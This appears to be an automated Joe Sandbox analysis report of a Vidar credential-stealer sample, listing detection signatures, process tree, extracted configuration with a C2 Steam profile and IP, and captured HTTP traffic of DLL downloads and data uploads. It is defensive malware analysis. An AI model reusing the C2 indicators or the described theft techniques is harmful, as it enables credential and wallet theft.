Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1445903
MD5:f4fb6b518e2e550467f533124e1f80f4
SHA1:964e735dd9410e07536e46b9f50c65fed148bcd7
SHA256:0a456f0fee171826bb44c9c2e1d5e7b95c0862b67d9dd75a843dec035224bb74
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F4FB6B518E2E550467F533124E1F80F4)
    • RegAsm.exe (PID: 5768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 4996 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2276 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
      • 0x30116:$x5: vchost.exe
      • 0x31116:$x5: vchost.exe
      00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x221f0:$s1: JohnDoe
      • 0x31f80:$s1: JohnDoe
      • 0x221e8:$s2: HAL9TH
      00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            2.2.RegAsm.exe.400000.0.raw.unpackHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
            • 0x30116:$x5: vchost.exe
            • 0x31116:$x5: vchost.exe
            2.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
            • 0x221f0:$s1: JohnDoe
            • 0x31f80:$s1: JohnDoe
            • 0x221e8:$s2: HAL9TH
            2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x20df0:$s1: JohnDoe
              • 0x20de8:$s2: HAL9TH
              Click to see the 2 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00410DAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406242
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_004082DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_0040245C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6CC46C80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD9A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CD9A9A0
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
              Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144493 FindFirstFileExW,0_2_00144493
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
              Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 78.47.123.174 78.47.123.174
              Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
              Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 6949Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 114541Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040514C
              Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
